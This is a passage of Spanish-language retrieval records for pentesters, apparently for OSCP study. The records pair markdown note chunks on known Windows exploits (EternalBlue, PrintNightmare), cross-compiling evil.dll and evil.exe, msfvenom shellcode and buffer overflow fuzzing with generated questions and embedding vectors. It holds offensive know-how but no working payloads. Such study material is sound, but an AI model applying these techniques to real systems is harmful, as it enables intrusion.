conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "cual es una alternativa libre a las tΓ©cnicas de ataques tipo EternalBlue o PrintNightmare?", "v": [-0.29326, 0.02499, -0.01832, -0.08444, -0.09992, 0.00983, -0.04282, 0.01461, -0.01464, 0.05133, -0.03459, -0.10631, 0.00977, 0.05862, 0.03092, -0.09213, -0.02664, -0.13668, 0.16043, 0.03459, -0.13171, -0.03078, -0.10311, -0.09111, -0.02502, 0.00503, -0.10941, 0.1341, -0.11997, 0.08001, -0.01511, 0.0504, 0.12365, -0.05943, 0.02245, -0.00702, 0.10192, 0.04682, 0.10129, 0.08263, -0.03842, -0.11466, -0.16465, -0.02401, 0.11374, -0.08105, -0.02751, 0.10631, 0.06191, 0.01372, -0.03298, 0.11895, -0.08393, 0.04234, 0.04144, -0.17097, 0.13808, -0.03185, -0.06978, 0.01721, -0.02757, -0.02351, 0.01556, -0.04434, 0.03869, -0.07749, -0.04436, -0.01586, -0.06416, 0.09627, 0.06993, -0.00224, -0.01333, -0.06718, 0.03274, 0.04559, -0.05175, 0.11953, 0.11276, -0.0348, -0.0381, 0.03154, -0.083, -0.09526, -0.10608, -0.02659, 0.01569, -0.1052, -0.10237, -0.02863, 0.07922, -0.00577, 0.00985, 0.01621, -0.05342, -0.09176, 0.00885, -0.02166, -0.07132, -0.0232, -0.01374, 0.0028, -0.07165, -0.05208, 0.03901, -0.10424, -0.08397, -0.03552, -0.0557, -0.04714, -0.03351, 0.10839, 0.01196, 0.00059, -0.00427, -0.13668, 0.00571, 0.00124, 0.04393, 0.01234, -0.13334, -0.02306, -0.02744, 0.03122, 0.05545, 0.02092, 0.02754, -0.02199, -0.12742, 0.01765, -0.00803, 0.04799, -0.0377, -0.05751, -0.1031, 0.03091, 0.05274, -0.12496, 0.05091, 0.01144, -0.01364, 0.09363, -0.03199, -0.0006, 0.01966, -0.02713, 0.04159, -0.07151, -0.03176, -0.01354, 0.021, 0.06678, 0.03308, 0.13561, -0.07301, 0.01311, -0.05379, -0.06797, -0.04795, 0.07943, 0.02515, 0.01269, -0.01784, 0.03505, -0.03736, -0.0053, -0.00748, -0.04535, 0.00414, -0.00371, 0.01487, 0.03808, 0.03358, -0.0729, 0.04286, -0.08644, -0.04147, -0.10317, 0.02137, -0.05092, 0.0047, 0.01572, -0.05575, 0.00999, 0.02333, -0.05388, 0.02732, 0.05319, 0.03519, -0.00261, -0.06772, -0.04493, -0.07671, -0.01072, -0.01412, 0.01884, -0.04404, -0.08363, -0.0162, 0.00287, -0.05488, 0.00447, -0.05251, -0.06909, 0.01458, 0.04125, -0.01948, -0.00385, -0.04664, 0.0618, 0.0417, -0.02016, 0.04124, -0.03332, -0.02084, -0.01715, -0.02312, -0.05989, -0.0158, -0.02959, 0.10118, -0.0252, -0.00629, 0.02811, -0.02779, 0.00812, 0.00431, -0.0242, -0.01963, -0.00259, 0.01053, 0.03288, -0.02577, 0.02573, -0.02798, 0.01575, 0.03062, 0.07503, 0.02448, 0.00749, 0.01754, 0.0407, 0.00034, -0.00489, -0.00302, -0.03181, -0.14899, -0.02225, -0.02921, -0.02565, 0.00153, 0.06744, 0.00336, 0.00147, -0.0123, -0.01067]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "que programa sirve para compilar cΓ³digo C en diferentes sistemas operativos?", "v": [0.03901, 0.00946, -0.10226, -0.15749, 0.02577, -0.35996, 0.07275, 0.00695, -0.10935, -0.07992, -0.03589, -0.12345, 0.05321, -0.12504, 0.08402, -0.11102, 0.11163, -0.15784, 0.04921, -0.02524, -0.05286, -0.02176, 0.04216, -0.0512, -0.03729, 0.12617, 0.02204, -0.06026, -0.09307, -0.04072, 0.04189, 0.01277, 0.19604, -0.07213, -0.08169, 0.05973, -0.01069, -0.00648, -0.11917, 0.03184, -0.06857, 0.00357, -0.07971, 0.05601, 0.11821, -0.05021, 0.08812, 0.02454, 0.0089, -0.08618, -0.0572, 0.03522, -0.11801, -0.02713, 0.06103, -0.13956, -0.05302, -0.08636, -0.03736, 0.00275, 0.05491, -0.02416, 0.06383, -0.06669, 0.07468, 0.00384, 0.03729, 0.00355, -0.0296, 0.03773, -0.04082, 0.11681, -0.00021, -0.00368, 0.04787, 0.05826, 0.01815, -0.08305, 0.04883, -0.0099, -0.01269, 0.0079, -0.03226, 0.04165, 0.01797, -0.03896, 0.07891, -0.04256, -0.02915, -0.05337, 0.07804, 0.0111, -0.00481, 0.08352, 0.10554, -0.03569, 0.07616, 0.08039, 0.0439, 0.07566, 0.05268, -0.10417, -0.08889, 0.04415, -0.00793, 0.10182, 0.11096, 0.00663, 0.06074, 0.00761, -0.02442, -0.06556, -0.06745, -0.01631, -0.0914, -0.00412, 0.04933, -0.02478, 0.00703, -0.01889, -0.12558, 0.10181, -0.08634, 0.06942, 0.08346, 0.04355, -0.01707, 0.11173, -0.02012, 0.00641, -0.0636, 0.00199, -0.01824, 0.04546, -0.04813, -0.0775, 0.05817, 0.00087, 0.0439, 0.01188, -0.01484, 0.10026, 0.05476, 0.09266, 0.02711, 0.07643, 0.04102, -0.07536, -0.01093, -0.06423, 0.06542, 0.06815, -0.0692, 0.03164, -0.06947, -0.0074, 0.05388, -0.02932, -0.0412, -0.00433, -0.01597, -0.01942, -0.04622, -0.06482, 0.00195, -0.02382, -0.00509, -0.00109, 0.08093, 0.06465, -0.00124, 0.07484, 0.11605, -0.08361, -0.00016, -0.01774, -0.00309, -0.03557, 0.00266, -0.01579, -0.08283, 0.06146, 0.09299, 0.00882, 0.0197, -0.0168, -0.03435, 0.05225, 0.01951, -0.02565, 0.02703, 0.06346, -0.00495, -0.02915, -0.03765, 0.00403, -0.00212, -0.02493, 0.05293, -0.06418, -0.06581, 0.03666, 0.03783, -0.08037, 0.03635, 0.10471, 0.02588, -0.00484, 0.04099, 0.06908, -0.00236, -0.0031, 0.02443, -0.01991, -0.04741, -0.04954, 0.00052, 0.07182, 0.02753, -0.02832, 0.00088, -0.02961, 0.01182, 0.07827, 0.00541, -0.01988, 0.02126, 0.02062, 0.04344, 0.01163, -0.0148, -0.05286, -0.01086, 0.01796, 0.04032, 0.00365, -0.01519, -0.01376, -0.02286, -0.09224, 0.00618, 0.051, -0.00128, -0.04729, -0.02248, -0.03352, -0.02416, -0.04951, -0.01464, -0.02857, -0.04985, -0.00271, 0.00952, -0.044, 0.01507, -0.00422]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "con que puedo generar shellcode listo para usar?", "v": [-0.07044, -0.04778, -0.24111, -0.02288, -0.09957, -0.15596, -0.0946, -0.01826, -0.0489, -0.14903, -0.2166, -0.06882, -0.04499, -0.13359, -0.01231, -0.04379, -0.0128, -0.10855, -0.01891, -0.00971, 0.01972, -0.0486, -0.11746, -0.14629, -0.04195, 0.08138, 0.01712, -0.01709, -0.10567, -0.03718, -0.06316, -0.10767, 0.01247, -0.08667, -0.09847, -0.01381, 0.02851, 0.05301, -0.08507, 0.13367, -0.01425, 0.06658, -0.15932, 0.06774, 0.01842, 0.04336, 0.02056, 0.02294, -0.04515, 0.0579, -0.04631, -0.0817, -0.19451, 0.07735, 0.03432, -0.04698, 0.10986, -0.13584, -0.06297, -0.00149, -0.1018, -0.03009, 0.05545, 0.01514, -0.05263, 0.01364, -0.01401, 0.00777, -0.14409, -0.0043, -0.0361, 0.09762, 0.01894, -0.02791, 0.03107, 0.08469, -0.05075, -0.05904, 0.04184, 0.12518, -0.06273, -0.07412, -0.00723, -0.0133, -0.04884, -0.07755, 0.051, -0.06691, 0.02532, -0.0833, -0.00218, -0.05333, -0.0055, 0.01414, 0.04975, -0.05559, -0.07305, 0.05586, 0.00738, 0.03049, 0.0475, -0.04537, 0.01742, 0.14066, 0.12139, -0.00339, 0.06676, 0.02686, 0.01441, 0.03224, -0.0315, -0.0816, -0.10785, -0.01699, -0.1099, -0.00126, -0.06157, -0.07852, 0.05113, -0.08665, 0.02451, 0.04204, -0.05265, 0.04768, 0.04808, 0.05709, -0.01528, 0.10244, -0.08404, 0.01019, -0.05122, 0.01734, -0.04965, -0.01129, -0.06447, 0.02553, -0.03856, 0.00687, 0.0058, 0.03698, 0.02354, 0.07392, -0.08152, 0.07959, -0.02077, 0.02085, -0.0459, -0.03789, -0.08341, -0.03938, 0.06124, -0.01561, -0.05601, 0.03645, -0.08241, -0.00603, 0.05041, -0.00838, 0.02861, -0.04265, -0.08749, -0.0404, -0.0651, 0.04828, 0.03453, -0.0301, 0.00306, -0.00412, 0.0219, 0.06257, 0.05196, 0.07971, 0.11393, -0.10289, 0.05511, -0.00617, -0.04545, -0.01484, -0.0723, -0.0574, -0.0144, 0.02505, -0.05391, -0.07694, -0.01013, 0.01937, 0.06509, 0.03979, -0.0476, 0.05525, -0.03669, 0.08821, 0.04494, -0.00186, 0.00043, 0.02647, 0.09021, -0.02304, -0.00075, -0.07198, -0.00864, 0.07736, -0.01162, -0.04779, 0.06879, 0.00898, -0.09029, -0.00176, 0.05635, -0.0052, 0.03335, -0.04815, 0.09917, 0.03248, 0.00414, 0.0327, -0.05091, 0.0238, 0.02786, -0.01673, 0.03039, 0.04528, 0.0109, 0.03023, 0.05289, 0.03611, -0.00385, -0.05292, 0.00491, 0.02411, -0.02562, 0.02052, 0.019, -0.03212, -0.00024, -0.00603, -0.01168, 0.00788, -0.04361, -0.02766, -0.01993, 0.0771, -0.0383, -0.02962, -0.01864, -0.01157, -0.03546, 0.00686, -0.04531, -0.0777, -0.04041, 0.01374, 0.0108, -0.02081, 0.01065, 0.00668]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "hay alguna herramienta para verificar si un cΓ³digo antes de ejecutarlo?", "v": [-0.00147, 0.12205, -0.19711, -0.088, 0.02703, -0.22267, 0.02008, 0.06221, -0.01695, -0.19092, -0.12731, -0.12423, 0.01923, -0.09911, 0.13349, 0.02178, 0.1189, -0.14859, 0.01314, 0.00178, 0.02541, -0.03339, -0.05908, -0.07205, -0.10378, 0.05857, -0.08323, 0.03193, -0.19126, -0.05016, -0.00908, 0.01893, 0.08264, -0.03852, -0.11405, 0.08063, 0.12027, 0.05223, -0.02042, 0.14088, -0.05482, 0.14816, -0.0188, 0.02716, -0.01456, -0.00388, 0.02847, 0.03863, 0.00404, -0.00502, 0.01058, -0.06974, -0.12947, -0.00626, -0.04298, -0.11967, 0.08988, -0.06002, -0.045, -0.09856, -0.01352, -0.10063, 0.02435, -0.04695, -0.01686, 0.04356, 0.07706, -0.02687, -0.03452, 0.08657, -0.05986, 0.07559, -0.05896, 0.0197, -0.00338, -0.10324, 0.05363, -0.04734, 0.08788, 0.06823, 0.01206, 0.02725, -0.05789, -0.05356, -0.08265, -0.08484, -0.03759, -0.0919, 0.028, -0.10672, 0.01856, 0.08045, -0.01656, 0.06769, 0.03735, 0.07424, 0.05292, 0.01722, 0.00038, 0.07777, 0.18026, -0.15217, 0.00119, 0.04908, 0.05971, 0.05026, -0.04069, 0.02933, -0.04052, -0.01457, -0.00213, -0.03157, -0.10509, -0.03306, -0.05563, 0.03031, -0.03677, -0.11197, 0.01436, -0.09804, -0.07333, 0.07361, -0.14729, 0.00886, 0.00291, 0.0217, 0.00876, 0.09715, 0.00444, -0.0653, -0.04681, -0.07653, -0.05968, 0.02927, -0.02485, 0.05137, 0.0528, -0.07035, 0.00942, -0.03966, 0.00781, 0.00872, 0.01409, 0.04972, 0.05753, 0.08807, -0.06151, -0.01538, -0.10093, 0.02635, 0.06247, -0.01862, -0.06733, 0.04168, -0.04914, 0.01559, -0.00203, 0.04962, -0.01343, -0.0074, -0.02941, -0.05925, 0.01322, -0.03195, 0.026, -0.01108, 0.04046, 0.01273, 0.04277, 0.04562, 0.05257, -0.00899, 0.08844, -0.03023, 0.04133, -0.06165, -0.05014, 0.00986, -0.01889, -0.05237, -0.00722, 0.05959, 0.02812, -0.04776, 0.00799, -0.02461, 0.05026, 0.02635, -0.01957, 0.02865, 0.05483, 0.02571, 0.05121, -0.01425, 0.05899, 0.04374, 0.03489, -0.01725, -0.0255, -0.05411, -0.04512, 0.00882, -0.02177, -0.09755, 0.03226, 0.08029, -0.0295, -0.0252, -0.02444, 0.06085, 0.04396, -0.0039, 0.03897, -0.02053, -0.04609, -0.03549, -0.02528, 0.07321, 0.0147, -0.00964, -0.00214, -0.01755, 0.04343, -0.0125, -0.01683, 0.0017, -0.00226, 0.04782, -0.00324, 0.02556, 0.0266, -0.0171, 0.00863, 0.02085, 0.05189, -0.02283, 0.04873, -0.01397, -0.03844, -0.07632, 0.01362, 0.04299, 0.01151, -0.05642, -0.00751, 0.02698, -0.04868, -0.0829, -0.03629, -0.06339, 0.02382, -0.03642, 0.0565, -0.07094, 0.01286, -0.02476]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "que programa puedo usar para crear patrones de buffer overflow en 32 bits?", "v": [0.14922, 0.03069, -0.17638, -0.11069, 0.04723, -0.03898, -2e-05, -0.07173, -0.13347, -0.20951, -0.11683, 0.03456, -0.06698, -0.0458, -0.17112, -0.07709, -0.08916, -0.09052, 0.05999, 0.0018, 0.02964, 0.04212, -0.05882, 0.0085, -0.0016, 0.04556, 0.03447, -0.00267, -0.12272, 0.06283, 0.04632, -0.00175, 0.11284, 0.02477, -0.02491, -0.08789, 0.02502, 0.01015, -0.04671, 0.13982, 0.05874, 0.06068, -0.05488, 0.13456, 0.06708, 0.01813, 0.00619, 0.00112, 0.04877, -0.02642, -0.01624, -0.0509, -0.0668, 0.08614, 0.02385, -0.17362, -0.04314, -0.15061, -0.13462, 0.00652, -0.02775, 0.0817, 0.03795, -0.03913, -0.01462, -0.08788, 0.0127, 0.06252, -0.15817, 0.10847, -0.02024, 0.03672, 0.04032, -0.05229, 0.03144, 0.0999, -0.03425, -0.05719, 0.05246, -0.0137, -0.12454, 0.05442, 0.06592, 0.01338, -0.08739, 0.03798, -0.00262, -0.08218, -0.02826, -0.0956, -0.01776, 0.09228, 0.0707, 0.06064, 0.10604, -0.03913, 0.17176, 0.10729, 0.01918, -0.00037, 0.05407, -0.08952, -0.03036, 0.12091, 0.05008, 0.05885, 0.0308, -0.1236, -0.02974, -0.07594, 0.03653, 0.05637, -0.00625, 0.00416, -0.0175, 4e-05, 0.04726, 0.05543, -0.00704, 0.02214, -0.03889, 0.00483, -0.00423, 0.03263, 0.0648, 0.04535, 0.01379, 0.0749, -0.07457, 0.02039, 0.00899, 0.09677, -0.04884, 0.00705, -0.07578, -0.08361, 0.02122, -0.00907, 0.08294, -0.03453, -0.01809, 0.08671, -0.03766, 0.05061, 0.02603, 0.051, -0.04646, -0.0843, -0.07674, -0.026, 0.0815, 0.02762, -0.06558, 0.02764, -0.05388, -0.02285, 0.0002, -0.00299, -0.02949, 0.00481, -0.03462, 0.00213, -0.03599, -0.02777, 0.02947, -0.10438, -0.026, -0.02891, 0.07426, 0.05939, -0.06482, 0.05145, 0.06882, -0.10311, 0.03276, -0.01806, -0.11217, -0.06325, 0.06646, -0.06155, -0.05971, -0.02111, 0.03673, 0.0109, -0.00737, -0.07159, 0.02208, 0.07459, -0.00918, 0.06591, -0.01555, 0.01064, 0.06674, -0.02112, 0.00219, -0.03478, 0.00121, 0.00549, 0.04547, -0.08902, -0.02232, 0.00951, -0.02575, -0.04276, 0.08267, 0.05583, -0.07892, -0.02958, 0.03501, 0.06865, 0.04613, -0.03249, 0.0702, -0.03683, -0.03162, 0.02975, -0.03633, 0.05176, 0.10197, -0.03446, 0.05054, 0.05435, -0.00054, 0.06843, 0.03464, -0.04531, 0.00352, 0.03236, 0.01653, -0.00979, -0.02812, -0.0471, 0.02248, -0.04843, -0.00673, -0.01538, -0.02592, 0.00773, -0.00251, -0.0791, -0.03262, 0.039, 0.01484, -0.025, 0.01285, 0.00756, -0.08734, -0.00778, -0.01409, -0.02942, -0.02388, 0.01666, 0.00696, -0.01657, 0.05042, 0.08242]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "con que herramienta puedo generar payloads con el mΓ©todo de 7 pasos para exploits stack?", "v": [0.09593, 0.10684, -0.31251, -0.21992, -0.02226, -0.00154, 0.02906, 0.0312, -0.04934, 0.01971, -0.07292, 0.05925, -0.00517, 0.03094, -0.02864, 0.05099, 0.01287, -0.083, -0.07569, -0.0298, -0.05512, -0.00603, -0.08636, -0.04712, 0.00637, 0.16131, 0.02281, -0.0286, -0.22992, 0.00287, -0.02338, 0.0849, -0.03046, -0.107, -0.04129, -0.08746, 0.01379, 0.06735, -0.02742, 0.11063, -0.1089, 0.00313, -0.11145, 0.01198, 0.04579, 0.05484, -0.04567, 0.03061, -0.02536, 0.01647, 0.08256, -0.11167, -0.15033, -0.02341, -0.058, -0.11141, 0.14116, -0.09077, -0.048, -0.00762, -0.02635, 0.05871, -0.04102, -0.01782, 0.02214, -0.08653, 0.01047, -0.00536, -0.10195, 0.09825, 0.08907, -0.01863, 0.02124, 0.04855, 0.02435, -0.02209, 0.05669, 0.00673, 0.02043, 0.11449, -0.03318, -0.06432, -0.08222, 0.0517, -0.07819, -0.06845, 0.06005, -0.02381, 0.12531, -0.12818, -0.03909, -0.06967, -0.04257, 0.06291, -0.00257, -0.01731, 0.10866, -0.01474, 0.01718, 0.04326, 0.05814, -0.07057, 0.00868, 0.03176, 0.00048, 0.0308, -0.00045, -0.01226, -0.08133, -0.09824, 0.06551, 0.03651, 0.04769, 0.03115, -0.07455, -0.0017, -0.01788, 0.00047, -0.08049, -0.08093, -0.01659, 0.06416, -0.11, 0.02416, 0.12889, -0.10062, -0.05129, 0.11784, 0.03496, -0.05643, -0.02852, 0.0202, -0.02346, 0.01354, 0.02371, -0.01991, 0.09408, -0.08827, 0.00324, -0.04887, 0.04489, 0.09963, 0.07705, -0.06214, 0.05723, -0.01472, -0.00683, -0.09967, -0.04536, -0.07521, -0.01802, -0.00789, -0.03747, 0.00429, -0.08092, -0.07725, 0.06889, 0.02831, -0.03411, 0.07021, -0.01732, 0.02535, -0.03045, 0.02499, -0.04849, -0.06343, -0.02063, 0.0066, -0.0197, 0.05197, -0.03156, 0.05638, 0.0512, -0.03428, 0.04421, -0.03313, -0.09461, -0.06447, 0.01631, -0.03339, -0.06259, 0.04568, -0.02226, 0.01607, -0.00187, -0.04965, 0.0406, -0.01516, 0.02387, 0.1104, 0.02262, 0.01934, 0.00659, -0.00236, -0.06695, -0.0032, -0.01333, -0.02005, 0.05301, -0.02095, 0.02903, 0.01565, 0.02826, -0.01785, 0.00253, 0.03424, -0.05151, -0.00527, -0.01077, 0.00806, 0.07294, -0.06084, 0.04765, -0.10685, -0.06033, 0.00867, -0.08424, 0.01187, -0.0641, 0.02576, 0.0145, 0.06006, 0.07225, -0.02576, -0.07362, 0.07905, -0.00954, 0.00141, 0.02904, -0.01218, 0.01383, 0.0007, -0.00228, 0.01147, 0.07863, -0.02777, 0.03925, -0.0694, -0.11745, 0.00829, -0.00624, 0.01401, -0.00169, -0.00608, -0.02294, -0.01888, -0.00545, -0.02656, 0.01621, -0.07102, 0.0001, 0.02558, 0.00363, -0.02668, 0.03802, -0.03608]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "que alternativa libre hay para inyectar shellcode y buscar desbordamientos de pila?", "v": [-0.07859, -0.07548, -0.24122, 0.05086, -0.01172, -0.15844, -0.00739, -0.07013, -0.13014, -0.12124, -0.04944, -0.08271, 0.08423, -0.09562, 0.07208, -0.07467, -0.08823, -0.10117, 0.08911, -0.11247, -0.05519, 0.06273, -0.14115, -0.0248, -0.12319, 0.00576, -0.02457, 0.04215, -0.14867, 0.03339, -0.0429, -0.07089, 0.0863, -0.00794, -0.04805, -0.03588, 0.14056, -0.04601, -0.07666, -0.04655, -0.15263, 0.06759, -0.1096, 0.03525, -0.0487, -0.02986, -0.0262, 0.11874, 0.02535, 0.13321, -0.10084, -0.10838, -0.10455, 0.01185, 0.1406, -0.01324, 0.11418, -0.06689, -0.04464, -0.10195, -0.12975, 0.0109, 0.11983, -0.03009, 0.09154, 0.0842, 0.01658, -0.01146, -0.0563, 0.0096, -0.00575, -0.08883, -0.03295, -0.05085, -0.06873, -0.01522, -0.02322, 0.04016, 0.00735, 0.06382, 0.03101, -0.13297, -0.05962, 0.08947, -0.00663, -0.06322, 0.11022, -0.10016, 0.01365, -0.00846, 0.14026, 0.05823, -0.02034, 0.20813, -0.08682, -0.09096, 0.00534, 0.08443, 0.02114, 0.05685, 0.10276, -0.02197, -0.0035, 0.05709, 0.12002, 0.01293, -0.00292, -0.01819, -0.01026, 0.04227, -3e-05, 0.01862, 0.01195, -0.01157, -0.06635, -0.07435, -0.06654, 0.0082, -0.02101, -0.06993, -0.00208, 0.03463, -0.13967, -0.0104, 0.03596, 0.01372, 0.01531, 0.04406, 0.00068, 0.05167, 0.07864, -0.05575, -0.05888, -0.06407, -0.06402, -0.0144, 0.0318, -0.02528, -0.03887, -0.01666, -0.01185, 0.04641, -0.04036, -0.00887, 0.02081, 0.02621, 0.03589, -0.02223, -0.05369, -0.05898, -0.03566, 0.06799, -0.00016, 0.11513, -0.05347, 0.05642, -0.00316, 0.01925, -0.05033, 0.03698, -0.03021, -0.04088, -0.02452, 0.02992, -0.01337, 0.01403, -0.01818, -0.01102, -0.00444, 0.00578, 0.02741, 0.06148, 0.06062, -0.06144, 0.01701, -0.03318, 0.0033, -0.02933, -0.00668, -0.03991, 0.00222, 0.04964, -0.06011, -0.06349, 0.00355, -0.05731, 0.03427, 0.01437, -0.01046, -0.0063, 0.04661, 0.02738, -0.0546, -0.05863, -0.02825, 0.01428, 0.02569, -0.0315, 0.0121, -0.06299, 0.0015, 0.07079, -0.02577, -0.03316, 0.036, -0.01234, -0.06962, 0.03539, 0.04588, 0.05886, 0.08977, -0.04465, 0.09626, -0.01415, -0.04927, 0.00697, 0.04572, -0.00399, 0.0225, 0.0244, -0.00265, 0.06475, 0.06968, 0.08393, -0.00069, -0.03733, 0.01493, 0.04211, 0.0086, 0.02955, 0.03241, 0.0286, 0.01863, -0.01028, 0.02593, 0.05863, 0.00244, 0.0081, -0.00014, -0.04336, 0.05308, 0.0305, -0.05689, 0.01364, -0.05057, -0.0289, -0.03395, -0.02235, -0.0237, -0.04263, -0.04449, -0.02206, -0.01196, -0.00819, 0.02387, 0.00755]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 1. Fuzzing β€” encontrar el crash\nScript Python que envΓ­a buffers crecientes (+100 bytes) hasta que la app casca.", "indexar": "que programa en python sirve para probar si una app se cae con datos grandes?", "v": [0.00994, -0.01205, -0.08571, -0.15745, 0.05947, -0.22192, 0.06581, 0.00547, -0.09429, -0.05114, -0.0471, -0.06489, -0.06071, -0.09892, -0.13298, -0.01567, 0.00966, -0.07574, 0.12341, 0.04272, -0.01047, 0.02296, -0.12758, -0.09449, -0.03065, 0.15385, 0.08448, 0.03679, -0.1182, 0.03635, 0.00859, 0.03732, 0.06901, -0.07729, -0.12243, 0.00152, 0.07601, 0.00324, -0.02492, 0.02395, -0.00727, -0.12389, -0.04396, 0.07946, -0.04139, 0.04642, -0.05594, 0.06191, -0.05089, -0.00482, -0.07335, -0.05287, 0.04208, 0.00594, 0.02377, -0.06327, -0.00045, -0.08477, 0.05149, 0.03874, -0.10504, -0.04488, 0.02068, -0.01467, 0.08367, -0.01192, 0.10433, 0.03832, -0.11939, 0.07844, -0.03252, 0.09798, -0.04365, -0.00125, 0.01125, -0.0012, -0.05194, -0.07117, -0.01241, -0.02814, -0.06164, -0.02451, -0.07844, 0.08572, -0.02583, -0.05626, 0.11661, 0.06111, 0.07282, -0.0398, 0.05584, 0.14465, 0.04072, 0.08638, 0.09173, 0.01178, 0.11753, -0.08874, 0.06444, 0.08234, 0.05843, -0.06278, -0.07653, 0.07508, -0.12293, 0.10187, 0.06296, 0.01497, -0.10471, -0.00865, 0.01696, -0.08029, -0.12512, -0.00118, -0.07661, -0.10376, -0.02169, -0.04517, -0.04918, -0.00185, -0.05238, 0.02638, -0.0423, 0.02888, 0.03155, 0.0237, 0.02536, 0.12126, -0.0106, 0.14635, -0.00814, 0.02998, -0.00275, 0.04242, -0.02859, 0.00443, 0.00494, -0.03594, 0.05771, -0.03797, -0.03028, 0.09547, -0.01253, -0.0036, 0.01717, -0.02007, 0.02786, 0.02539, -0.01256, 0.02526, 0.04253, 0.00531, 0.02189, 0.09526, -0.15874, -0.02352, 0.00503, -0.06089, -0.03275, 0.03116, -0.00126, -0.02618, -0.07872, -0.03011, 0.06789, -0.07024, 0.07603, -0.04877, 0.15593, 0.07144, -0.05689, 0.07871, 0.05302, -0.1181, -0.01168, -0.03089, 0.03014, -0.07554, -0.06842, -0.04015, -0.01138, -0.04825, 0.05915, -0.00116, 0.0182, -0.04913, 0.01212, 0.01233, -0.00087, -0.00763, -0.01813, 0.11401, -0.00639, -0.01303, 0.02914, -0.05518, -0.00175, 0.05245, 0.04401, -0.04426, -0.02603, 0.01688, -0.04962, 0.02144, 0.00437, 0.12144, -0.04176, -0.00763, 0.04947, 0.00538, -0.01905, -0.01826, 0.04503, 0.0496, -0.03333, -0.08371, 0.03286, 0.12433, 0.01387, 0.03201, -0.10895, -0.01507, 0.05299, 0.06346, -0.03053, -0.01295, 0.07532, -0.04621, 0.04004, -0.0252, -0.01364, -0.02414, -0.01956, 0.01758, 0.03246, -0.04257, 0.01122, 0.00303, -0.079, -0.09643, -0.0197, 0.08428, -0.00635, -0.05796, -0.03997, -0.00398, -0.0258, -0.00496, -0.00471, -0.01025, -0.05309, 0.00994, 0.06157, -0.06487, 0.02174, 0.02846]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 1. Fuzzing β€” encontrar el crash\nScript 